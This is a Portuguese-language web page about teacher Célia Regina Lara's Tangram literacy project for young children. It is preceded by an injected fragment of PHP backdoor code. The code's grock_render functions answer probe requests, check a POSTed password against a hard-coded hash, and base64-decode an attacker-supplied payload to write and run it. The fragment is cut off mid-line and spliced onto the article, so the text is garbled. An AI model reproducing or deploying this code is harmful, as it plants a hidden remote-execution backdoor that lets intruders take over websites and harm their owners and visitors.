/tmp/znbdw.jpg function grock_render_js(){ echo ""; } function grock_render_index(){ echo md5('56749'); } function grock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4="
Célia Regina Lara – Paula Freitas (PR)
A educadora Célia Regina desenvolveu o projeto interdiciplinar “Tangram na Alfabetização” com os objetivos de trabalhar o raciocínio, a criatividade e concentração dos pequenos, estimulando a aprendizagem de forma prazerosa. A atividade foi realizada com 48 alunos com idades entre 5 e 6 anos.
A educadora Célia Regina de Lara é formada em Magistério com adicional em Educação Especial, graduada em História e pós-graduada em Psicopedagogia e em Educação Especial com ênfase em Libras. Atualmente atua na Escola Municipal Mauro de Oliveira Cavallin, em que leciona há 20 anos, e também na Escola Alana Maria Mendes De Araújo na modalidade de Educação Especial (APAE), com alunos autistas.
Num primeiro momento, os alunos coloriram, recortaram e montaram o quebra cabeça do tangram.
Depois, as crianças montaram o quebra-cabeça e brincaram livremente.
A primeira figura montada e colada foi esta casinha, pois é mais fácil para entender como organizar cada figura.
Em seguida, a professora colocou músicas infantis para cantarem, brincarem e montar figuras com tangram que ilustrassem as canções.